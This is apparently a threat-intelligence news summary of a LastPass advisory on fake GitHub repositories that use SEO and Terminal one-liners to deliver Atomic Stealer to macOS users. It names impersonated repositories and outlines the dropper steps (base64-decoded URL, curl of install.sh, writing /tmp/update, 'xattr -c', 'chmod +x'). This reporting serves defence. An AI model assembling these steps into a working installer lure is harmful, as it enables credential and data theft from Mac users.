SEO-poisoned GitHub Repos Push Atomic Stealer to macOS

Research and an advisory from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team report an ongoing macOS-focused operation aiming to deliver Atomic (AMOS) information-stealing malware via fraudulent GitHub repositories posing as “Mac” or “MacBook” desktop apps. Per LastPass, the campaign leans on search engine optimization (SEO) to place these fake project pages prominently on Google and Bing, then funnels users to copy a Terminal command as part of a quick install. Repository themes point to broad targeting across technology and financial services, with pages imitating well-known platforms; examples include “github[.]com/Charles-Schwab-Desktop-on-MacBook,” “github[.]com/Citibank-on-MacBook-Desktop-App,” “github[.]com/Confluence-on-MacBook,” “github[.]com/Gemini-on-MacBook,” “github[.]com/Salesloft-on-MacBook,” and “github[.]com/SentinelOne-on-MacBook.” The TIME team also identified repositories impersonating LastPass itself, indicating the operators are seeding dozens of look-alike projects across multiple accounts; as LastPass notes, “Notably, the GitHub pages appear to be created by multiple GitHub usernames to get around takedowns.” A large set of copycat repositories was reported for more than one hundred software titles, and the use of “ClickFix” lures is tuned for macOS searchers.

LastPass details the infection sequence observed in a repository posted on September 16, 2025 by the alias “modhopmduck476,” which presented as “LastPass for macOS.” The page instructs victims to run a one-liner in “Terminal” that fetches and executes an installer, with a base64-encoded URL. The base64 decodes to a remote “install.sh,” which immediately pulls a second stage. This sequence writes the Atomic payload as “/tmp/update,” clears quarantine metadata via “xattr -c,” marks it executable with “chmod +x,” and runs it, at which point AMOS begins credential and data theft consistent with prior campaigns. The observable process and file activity center on “/bin/bash” with a base64 URL being decoded, “curl,” retrieval of “install.sh,” creation and execution of “/tmp/update,” and use of “xattr” to remove extended attributes before launch. LastPass says it is actively pursuing takedowns and IOC sharing and that it “will continue to monitor this campaign and provide updates as warranted.”